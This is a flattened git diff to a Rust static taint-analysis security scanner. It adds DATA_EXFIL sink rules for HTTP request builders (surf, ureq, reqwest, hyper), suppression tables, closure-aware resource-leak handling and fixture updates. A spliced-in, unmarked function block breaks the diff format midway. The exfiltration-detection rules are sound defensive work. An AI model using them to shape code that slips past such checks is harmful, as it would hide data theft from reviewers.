formals AND + // not a dotted access on a formal (`input.cmd` where `input` is + // a formal — it represents a structural projection of the + // formal, not a free variable; the auto-seed should still treat + // it as part of the formal's own taint surface). 
Receivers are + // intentionally excluded: `this` / `self` represent the implicit + // receiver, which always belongs to the function. + // + // Only fire when the caller supplied formal-parameter names; see + // the `track_synthetic` rationale above. + let root_is_formal = var + .split_once('.') + .map(|(root, _)| formal_set.contains(root)) + .unwrap_or(false); + if track_synthetic + && !is_receiver + && !formal_set.contains(var.as_str()) + && !root_is_formal + { + synthetic_externals.insert(v); + } synthetic_body.push(SsaInst { value: v, op, @@ -1784,6 +1838,7 @@ fn rename_variables( cfg_node_map, field_interner, field_writes, + synthetic_externals, ) } diff --git a/src/ssa/param_points_to.rs b/src/ssa/param_points_to.rs index b20c18da..ecaeef0e 100644 --- a/src/ssa/param_points_to.rs +++ b/src/ssa/param_points_to.rs @@ -417,6 +417,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } diff --git a/src/ssa/static_map.rs b/src/ssa/static_map.rs index 6a558e9d..3f6351a2 100644 --- a/src/ssa/static_map.rs +++ b/src/ssa/static_map.rs @@ -440,6 +440,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg: Cfg = Graph::new(); let const_values = HashMap::new(); diff --git a/src/ssa/type_facts.rs b/src/ssa/type_facts.rs index a5f1aa90..16aa74fd 100644 --- a/src/ssa/type_facts.rs +++ b/src/ssa/type_facts.rs @@ -25,6 +25,15 @@ pub enum TypeKind { FileHandle, Url, HttpClient, + /// A pre-network HTTP request builder produced by `Client::post(url)`, + /// `surf::post(url)`, `Request::builder()`, `ureq::post(url)`, etc. 
+ /// The body-bind methods (`body`, `json`, `form`, `multipart`, + /// `body_string`, `body_json`, `body_bytes`) and terminal verbs + /// (`send`, `send_string`, `send_json`, `send_form`) are sinks for + /// `DATA_EXFIL` when receiver-typed. Distinct from `HttpClient` so + /// type-qualified resolution can attach builder-only rules without + /// over-firing on plain client objects. + RequestBuilder, /// A local, in-memory collection (HashMap, HashSet, Vec, etc.). /// The auth sink gate uses this so calls like `map.insert(...)` /// are treated as bookkeeping rather than cross-tenant sinks. No @@ -76,6 +85,7 @@ impl TypeKind { Self::DatabaseConnection => Some("DatabaseConnection"), Self::FileHandle => Some("FileHandle"), Self::Url => Some("URL"), + Self::RequestBuilder => Some("RequestBuilder"), _ => None, } } @@ -180,9 +190,10 @@ impl TypeFactResult { /// /// Suppression policy: /// * [`TypeKind::Int`] (and float, treated as numeric): suppresses -/// `SQL_QUERY`, `FILE_IO`, `SHELL_ESCAPE`, `HTML_ESCAPE`, `SSRF` , -/// numeric values cannot carry the metacharacters required to drive -/// any of these injection classes. +/// `SQL_QUERY`, `FILE_IO`, `SHELL_ESCAPE`, `HTML_ESCAPE`, `SSRF`, +/// `DATA_EXFIL`, numeric values cannot carry the metacharacters +/// required to drive any of these injection classes, nor can they +/// encode credentials/tokens that meaningfully constitute leakage. /// * [`TypeKind::Bool`]: suppresses every type-suppressible bit , /// `true`/`false` cannot carry a payload of any kind. 
/// Does the peeled Rust callee correspond to a known HTTP request-builder
/// constructor / factory?
///
/// Matching is purely suffix-based on `base`. The recognised shapes are:
/// * surf free verbs: `surf::post`, `surf::get`, `surf::put`, `surf::delete`,
///   `surf::patch`, `surf::head`, `surf::connect`, `surf::trace`;
/// * ureq free verbs: `ureq::post`, `ureq::get`, `ureq::put`, `ureq::delete`,
///   `ureq::patch`, `ureq::head`;
/// * the hyper request builder: anything ending in `Request::builder`
///   (which also covers the fully qualified `hyper::Request::builder`);
/// * a reqwest-style verb on a client, either in chained form
///   (`Client::new.post`) or path form (`Client::post`), for the verbs
///   `post`, `get`, `put`, `delete`, `patch`, `head`, `request`.
///
/// A bare `Client::new` does not match: `new` is not one of the verbs, so
/// the call that produces the client itself is never classified as a
/// request builder by this function.
///
/// NOTE(review): because only the suffix is inspected, callees such as
/// `HttpClient::post` or `other_crate::Client::get` also match. Confirm
/// that this breadth is intended before tightening it.
fn is_rust_request_builder_constructor(base: &str) -> bool {
    // surf free verbs that return a Request (acts as a builder).
    const SURF_VERBS: &[&str] = &[
        "post", "get", "put", "delete", "patch", "head", "connect", "trace",
    ];
    // ureq free verbs that return a Request.
    const UREQ_VERBS: &[&str] = &["post", "get", "put", "delete", "patch", "head"];
    // Verbs callable on a reqwest `Client` instance; each returns a
    // RequestBuilder.
    const REQWEST_CLIENT_VERBS: &[&str] =
        &["post", "get", "put", "delete", "patch", "head", "request"];

    // True when `base` ends with `{prefix}{verb}` for any verb in `verbs`.
    // Peeling the verb and then checking the prefix is equivalent to
    // `base.ends_with(&format!("{prefix}{verb}"))` without allocating a
    // temporary `String` per candidate.
    fn ends_with_any(base: &str, prefix: &str, verbs: &[&str]) -> bool {
        verbs.iter().any(|verb| {
            base.strip_suffix(verb)
                .is_some_and(|head| head.ends_with(prefix))
        })
    }

    // `Request::builder` subsumes `hyper::Request::builder`, so a single
    // suffix test covers both spellings.
    base.ends_with("Request::builder")
        || ends_with_any(base, "surf::", SURF_VERBS)
        || ends_with_any(base, "ureq::", UREQ_VERBS)
        // Chain text after receiver collapse: `reqwest::Client::new.post`.
        || ends_with_any(base, "Client::new.", REQWEST_CLIENT_VERBS)
        // Path form: `Client::post`, `reqwest::Client::get`, ...
        || ends_with_any(base, "Client::", REQWEST_CLIENT_VERBS)
}
Truth values: /// - /// | TypeKind | SQL | FILE | SHELL | HTML | SSRF | CODE_EXEC | DESERIALIZE | - /// |-----------|-----|------|-------|------|------|-----------|-------------| - /// | Int | Y | Y | Y | Y | Y | N | N | - /// | Bool | Y | Y | Y | Y | Y | N | N | - /// | String | N | N | N | N | N | N | N | - /// | Url | N | N | N | N | N | N | N | - /// | Object | N | N | N | N | N | N | N | - /// | Unknown | N | N | N | N | N | N | N | + /// | TypeKind | SQL | FILE | SHELL | HTML | SSRF | DATA_EXFIL | CODE_EXEC | DESERIALIZE | + /// |-----------|-----|------|-------|------|------|------------|-----------|-------------| + /// | Int | Y | Y | Y | Y | Y | Y | N | N | + /// | Bool | Y | Y | Y | Y | Y | Y | N | N | + /// | String | N | N | N | N | N | N | N | N | + /// | Url | N | N | N | N | N | N | N | N | + /// | Object | N | N | N | N | N | N | N | N | + /// | Unknown | N | N | N | N | N | N | N | N | #[test] fn type_kind_cap_suppression_matrix() { use crate::labels::Cap; @@ -1324,40 +1405,41 @@ mod tests { ("SHELL_ESCAPE", Cap::SHELL_ESCAPE), ("HTML_ESCAPE", Cap::HTML_ESCAPE), ("SSRF", Cap::SSRF), + ("DATA_EXFIL", Cap::DATA_EXFIL), ("CODE_EXEC", Cap::CODE_EXEC), ("DESERIALIZE", Cap::DESERIALIZE), ]; // (kind_name, kind, [suppress for each cap in `caps` order]) - let rows: &[(&str, TypeKind, [bool; 7])] = &[ + let rows: &[(&str, TypeKind, [bool; 8])] = &[ ( "Int", TypeKind::Int, - [true, true, true, true, true, false, false], + [true, true, true, true, true, true, false, false], ), ( "Bool", TypeKind::Bool, - [true, true, true, true, true, false, false], + [true, true, true, true, true, true, false, false], ), ( "String", TypeKind::String, - [false, false, false, false, false, false, false], + [false, false, false, false, false, false, false, false], ), ( "Url", TypeKind::Url, - [false, false, false, false, false, false, false], + [false, false, false, false, false, false, false, false], ), ( "Object", TypeKind::Object, - [false, false, false, false, false, false, 
false], + [false, false, false, false, false, false, false, false], ), ( "Unknown", TypeKind::Unknown, - [false, false, false, false, false, false, false], + [false, false, false, false, false, false, false, false], ), ]; for (kind_name, kind, expected) in rows { @@ -1389,6 +1471,7 @@ mod tests { Cap::SHELL_ESCAPE, Cap::HTML_ESCAPE, Cap::SSRF, + Cap::DATA_EXFIL, Cap::CODE_EXEC, Cap::DESERIALIZE, ] { @@ -1487,6 +1570,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let consts = HashMap::new(); diff --git a/src/state/facts.rs b/src/state/facts.rs index e9c91320..a5d5fa6a 100644 --- a/src/state/facts.rs +++ b/src/state/facts.rs @@ -19,19 +19,29 @@ fn sanitize_desc(s: &str) -> String { /// convergence node where all execution paths join before leaving the function. /// /// **Invariant:** Only terminal exits carry the complete merged lifecycle state -/// needed for leak analysis. Return nodes are intermediate (they flow into the -/// terminal exit) and must NOT be analyzed for terminal resource state. -/// -/// Detection is purely topological: a node inside a function is terminal when -/// it has no successor within the same function scope. This works for both -/// per-body graphs (Exit node is a sink) and legacy supergraphs (the -/// synthesized Return's successor is the file-level Exit with +/// needed for leak analysis. Return nodes are intermediate in per-body graphs +/// (they flow into the synthetic Exit node) but become terminal in legacy +/// supergraphs (their successor is the file-level Exit with /// `enclosing_func = None`). +/// +/// Detection combines a kind filter with a topological check. Only nodes +/// whose `StmtKind` actually terminates execution (`Exit`, `Return`, `Throw`) +/// are considered, then we require that they have no successor in the same +/// function scope. 
Without the kind filter, dangling Seq nodes left behind +/// when nested function literals (e.g. `obj.fn = () => {...}`) get a +/// placeholder in the parent graph would be misclassified as terminal exits +/// and produce spurious resource-leak findings at the function-literal span. fn is_terminal_function_exit( idx: petgraph::graph::NodeIndex, info: &crate::cfg::NodeInfo, cfg: &Cfg, ) -> bool { + if !matches!( + info.kind, + StmtKind::Exit | StmtKind::Return | StmtKind::Throw + ) { + return false; + } info.ast.enclosing_func.is_some() && !cfg .neighbors_directed(idx, petgraph::Direction::Outgoing) @@ -62,6 +72,7 @@ pub struct StateFinding { /// `state-unauthed-access` finding is suppressed on those spans because /// the user-controlled input has already been proved unable to escape /// into a privileged location. +#[allow(clippy::too_many_arguments)] pub fn extract_findings( result: &DataflowResult, cfg: &Cfg, @@ -70,6 +81,7 @@ pub fn extract_findings( func_summaries: &crate::cfg::FuncSummaries, enable_auth: bool, path_safe_suppressed_sink_spans: &std::collections::HashSet<(usize, usize)>, + closure_released_var_names: Option<&std::collections::HashSet>, ) -> Vec { let mut findings = Vec::new(); @@ -195,6 +207,23 @@ pub fn extract_findings( continue; } + // Suppress leaks for variables whose release call lives in a + // nested closure (callback / event handler) outside this + // body's CFG. Common JS/TS shape: + // const ws = new WebSocket(url); + // socket.on("close", () => ws.close()); + // The per-body resource analysis cannot observe the close + // inside the registered handler body; without this gate the + // handle reads as a definite leak. Match by variable name — + // closure-captured handles share the binding name with the + // handle in the outer scope. 
+ if closure_released_var_names + .map(|s| s.contains(var_name)) + .unwrap_or(false) + { + continue; + } + // Prefer direct acquire node span; fall back to proxy span // from ResourceMethodSummary (cross-body resource tracking). let acquire_span = acquire_node @@ -557,6 +586,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert_eq!(findings.len(), 1); @@ -617,6 +647,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert!(findings.is_empty()); @@ -751,6 +782,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert!( @@ -816,6 +848,7 @@ mod tests { &HashMap::new(), false, &std::collections::HashSet::new(), + None, ); assert_eq!( diff --git a/src/state/mod.rs b/src/state/mod.rs index 20dc32cc..101611c2 100644 --- a/src/state/mod.rs +++ b/src/state/mod.rs @@ -77,6 +77,13 @@ pub fn run_state_analysis( // m.Lock()`) and routes them through `chain_proxies` instead. Pass // `None` to disable, strict-additive. ptr_proxy_hints: Option<&std::collections::HashMap>, + // Names of variables whose `.close()`/release calls live in a nested + // closure (event handler, deferred callback) that the per-body CFG + // can't observe directly. Used to suppress resource-leak findings + // for handles whose cleanup is registered as a callback (`ws.on( + // "close", () => ws2.close())`). Pass `None` for languages or + // shapes that don't need this. + closure_released_var_names: Option<&std::collections::HashSet>, ) -> Vec { let _span = tracing::debug_span!("run_state_analysis").entered(); @@ -116,9 +123,99 @@ pub fn run_state_analysis( func_summaries, enable_auth, path_safe_suppressed_sink_spans, + closure_released_var_names, ) } +/// Build a per-body map of variable names whose release calls +/// (`.close`, `.destroy`, `.end`, `.release`, …) appear inside a +/// **descendant** body (a closure / event handler nested inside the +/// body that opens the handle). 
+/// +/// Returned: `body_id → set of var names released somewhere inside +/// that body's nested-closure subtree`. Used by the structural +/// ResourceMisuse pass and the state-model leak pass to suppress +/// findings whose cleanup lives in a callback the per-body CFG can't +/// follow (`socket.on("close", () => ws.close())`). +/// +/// Restricted to descendants — sibling methods on the same class +/// don't share resource ownership, so a release in `queryAndClose` +/// must NOT silence a leak in sibling `queryAndLeak`. Only true +/// nested-closure parent / child relationships participate. +pub fn collect_closure_released_var_names( + bodies: &[crate::cfg::BodyCfg], + lang: Lang, +) -> std::collections::HashMap> { + use crate::cfg::{BodyId, StmtKind}; + use petgraph::visit::IntoNodeReferences; + + // Step 1: collect releases per body. Only nested (non-toplevel) + // closures are eligible — top-level bodies' own releases are + // already tracked by the dataflow. + let pairs = rules::resource_pairs(lang); + let mut per_body: std::collections::HashMap> = + std::collections::HashMap::new(); + for body in bodies { + if body.meta.parent_body_id.is_none() { + continue; + } + let mut local = std::collections::HashSet::new(); + for (_idx, info) in body.graph.node_references() { + if info.kind != StmtKind::Call { + continue; + } + let Some(callee) = info.call.callee.as_deref() else { + continue; + }; + let cl = callee.to_ascii_lowercase(); + let is_release = pairs.iter().any(|p| { + p.release.iter().any(|r| { + let rl = r.to_ascii_lowercase(); + if let Some(method) = rl.strip_prefix('.') { + cl.ends_with(&format!(".{method}")) + } else { + cl == rl || cl.ends_with(&format!(".{rl}")) + } + }) + }); + if !is_release { + continue; + } + if let Some(rcv) = info.call.receiver.as_deref() { + local.insert(rcv.to_string()); + } else if let Some((rcv, _)) = callee.rsplit_once('.') + && !rcv.is_empty() + { + local.insert(rcv.to_string()); + } + } + if !local.is_empty() { + 
per_body.insert(body.meta.id, local); + } + } + + // Step 2: roll up into ancestor bodies. Walk each non-top body's + // parent chain and union its release set into every ancestor's + // entry. Class methods at the same nesting level (siblings under a + // class body) do not roll up into each other — they have distinct + // BodyId entries and the chain only flows through `parent_body_id`. + let mut rollup: std::collections::HashMap> = + std::collections::HashMap::new(); + let by_id: std::collections::HashMap = + bodies.iter().map(|b| (b.meta.id, b)).collect(); + for body in bodies { + let Some(local) = per_body.get(&body.meta.id) else { + continue; + }; + let mut cur = body.meta.parent_body_id; + while let Some(pid) = cur { + rollup.entry(pid).or_default().extend(local.iter().cloned()); + cur = by_id.get(&pid).and_then(|b| b.meta.parent_body_id); + } + } + rollup +} + /// Build resource method summaries by pre-scanning all method bodies for known /// resource acquire/release operations. Only creates summaries for methods whose /// bodies actually contain matching operations, never infers from names alone. diff --git a/src/state/transfer.rs b/src/state/transfer.rs index 0b55c4cb..9c98512d 100644 --- a/src/state/transfer.rs +++ b/src/state/transfer.rs @@ -635,6 +635,19 @@ impl DefaultTransfer<'_> { fn apply_assignment(&self, _node_idx: NodeIndex, info: &NodeInfo, state: &mut ProductState) { // Ownership transfer: if `defines` reassigns a tracked resource // variable from a `uses` variable, transfer the lifecycle. + // + // Skip when the RHS is a function or lambda literal: storing a + // closure into a property (`ws.onclose = () => { ... }`, + // `obj.handler = function(){...}`) does not move ownership of the + // resources the closure body references — those identifiers appear + // in `info.taint.uses` only because `def_use` walks the literal's + // body, not because the assignment itself reads them. 
Without this + // gate, the first OPEN-tracked capture inside the closure body gets + // marked MOVED and the property's symbol becomes the new OPEN + // owner, which then surfaces as a spurious leak on the property. + if info.rhs_is_function_literal { + return; + } if let Some(ref def) = info.taint.defines && let Some(def_sym) = self.get_sym(info, def) { diff --git a/src/summary/ssa_summary.rs b/src/summary/ssa_summary.rs index 67e79348..142bf87c 100644 --- a/src/summary/ssa_summary.rs +++ b/src/summary/ssa_summary.rs @@ -158,6 +158,39 @@ pub struct SsaFuncSummary { /// (caller_param_index, sink_arg_position, sink_caps). #[serde(default)] pub param_to_sink_param: Vec<(usize, usize, Cap)>, + /// Per-parameter gate-filter cap masks lifted from inner multi-gate + /// sink call sites. + /// + /// When a function body contains a callee whose + /// [`crate::cfg::CallMeta::gate_filters`] carries more than one entry + /// (e.g. `fetch` is both an `SSRF` gate on the URL arg and a + /// `DATA_EXFIL` gate on the body arg), the multi-gate dispatch in + /// [`super::super::collect_block_events`] cap-narrows the event's + /// `sink_caps` to the specific gate's `label_caps`. Each + /// `(param_idx, label_caps)` entry records that this function's + /// parameter `param_idx` flowed into a gated sink whose narrowed + /// caps were `label_caps`. + /// + /// Cross-file callers consume this list to preserve per-position cap + /// attribution through wrapper functions: a wrapper + /// `fn forward(url, body) { fetch(url, {body}) }` records + /// `[(0, SSRF), (1, DATA_EXFIL)]` so a caller of `forward` splits + /// URL-tainted SSRF findings from body-tainted DATA_EXFIL findings + /// instead of conflating both caps onto every parameter. 
+ /// + /// `Vec<(param_idx, label_caps)>` is sufficient at cross-file + /// granularity, the corresponding `payload_args` and + /// `destination_uses` are intra-file context that does not survive + /// the function-summary boundary (field idents reference SSA + /// values from the callee body). + /// + /// Empty (the default) for callees whose internal sinks carry zero + /// or one gate filter, the existing + /// [`Self::param_to_sink`] / + /// [`Self::param_to_sink_param`] machinery already records those + /// cases without per-position cap conflict. + #[serde(default, skip_serializing_if = "Vec::is_empty")] + pub param_to_gate_filters: Vec<(usize, Cap)>, /// Parameter indices whose container identity flows to the return value /// (e.g., function returns the same container it received as input). /// diff --git a/src/summary/tests.rs b/src/summary/tests.rs index 9b13dd23..6c3e6bed 100644 --- a/src/summary/tests.rs +++ b/src/summary/tests.rs @@ -441,6 +441,7 @@ fn ssa_summary_serde_round_trip_identity() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -473,6 +474,7 @@ fn ssa_summary_serde_round_trip_strip_bits() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -502,6 +504,7 @@ fn ssa_summary_serde_round_trip_add_bits() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -538,6 +541,7 @@ fn 
ssa_summary_serde_round_trip_all_variants() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -576,6 +580,7 @@ fn global_summaries_insert_ssa_exact_key_replacement() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; gs.insert_ssa(key.clone(), v1.clone()); assert_eq!(gs.get_ssa(&key), Some(&v1)); @@ -602,6 +607,7 @@ fn global_summaries_insert_ssa_exact_key_replacement() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; gs.insert_ssa(key.clone(), v2.clone()); assert_eq!(gs.get_ssa(&key), Some(&v2)); @@ -648,6 +654,7 @@ fn global_summaries_merge_with_ssa_entries() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let sum_b = SsaFuncSummary { param_to_return: vec![], @@ -670,6 +677,7 @@ fn global_summaries_merge_with_ssa_entries() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; gs1.insert_ssa(key_a.clone(), sum_a.clone()); @@ -716,6 +724,7 @@ fn global_summaries_is_empty_considers_ssa() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -745,6 +754,7 @@ fn ssa_summary_serde_round_trip_param_to_sink_param() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = 
serde_json::from_str(&json).unwrap(); @@ -789,6 +799,7 @@ fn ssa_summary_serde_round_trip_container_fields() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -843,6 +854,7 @@ fn ssa_summary_serde_round_trip_return_abstract() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); @@ -916,6 +928,8 @@ fn make_callee_body( exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }, opt: crate::ssa::OptimizeResult { const_values: std::collections::HashMap::new(), @@ -1361,6 +1375,7 @@ fn global_summaries_resolve_body_requires_body_present() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // Don't insert body @@ -3504,6 +3519,7 @@ fn cf4_return_path_transform_serde_round_trip() { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }; let json = serde_json::to_string(&summary).unwrap(); let back: SsaFuncSummary = serde_json::from_str(&json).unwrap(); diff --git a/src/symex/executor.rs b/src/symex/executor.rs index 479e04e9..96e8be85 100644 --- a/src/symex/executor.rs +++ b/src/symex/executor.rs @@ -1382,6 +1382,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; 
let empty_succs = HashMap::new(); @@ -1441,6 +1443,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let empty_succs = HashMap::new(); @@ -1573,6 +1577,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = make_finding(n0, n1); @@ -1680,6 +1686,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; // Finding path goes through B0 → B1 → B3 @@ -1826,6 +1834,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -1938,6 +1948,8 @@ mod tests { exception_edges: vec![(b0, b2)], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let mut exc_succs: HashMap> = HashMap::new(); @@ -2004,6 +2016,8 @@ mod tests { exception_edges: vec![(b0, b2)], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let mut exc_succs: HashMap> = HashMap::new(); @@ -2111,6 +2125,8 @@ mod tests { exception_edges: vec![(b1, b2)], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { diff --git a/src/symex/loops.rs b/src/symex/loops.rs index 4534009d..652476b4 100644 --- 
a/src/symex/loops.rs +++ b/src/symex/loops.rs @@ -389,6 +389,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -434,6 +436,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -515,6 +519,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -577,6 +583,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -657,6 +665,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -728,6 +738,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -762,6 +774,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -818,6 +832,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: 
std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -898,6 +914,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -976,6 +994,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); @@ -1011,6 +1031,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let info = analyse_loops(&ssa); diff --git a/src/symex/mod.rs b/src/symex/mod.rs index bcd0bf1c..1e3b0041 100644 --- a/src/symex/mod.rs +++ b/src/symex/mod.rs @@ -379,6 +379,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -452,6 +454,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -554,6 +558,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let ctx = SymexContext { @@ -614,6 +620,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), 
}; let ctx = SymexContext { diff --git a/src/symex/state.rs b/src/symex/state.rs index bf10584a..4bb3a7a4 100644 --- a/src/symex/state.rs +++ b/src/symex/state.rs @@ -353,6 +353,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let witness = state.get_sink_witness(&finding, &ssa); @@ -393,6 +395,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert_eq!(state.get_sink_witness(&finding, &ssa), None); @@ -430,6 +434,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; assert_eq!(state.get_sink_witness(&finding, &ssa), None); @@ -470,6 +476,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; state.widen_at_loop_head(BlockId(0), &ssa); @@ -513,6 +521,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; state.widen_at_loop_head(BlockId(0), &ssa); @@ -556,6 +566,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; state.widen_at_loop_head(BlockId(0), &ssa); diff --git a/src/symex/transfer.rs b/src/symex/transfer.rs index 3a18cd2f..7b04289c 100644 --- a/src/symex/transfer.rs +++ b/src/symex/transfer.rs @@ -1012,6 +1012,8 @@ mod tests { 
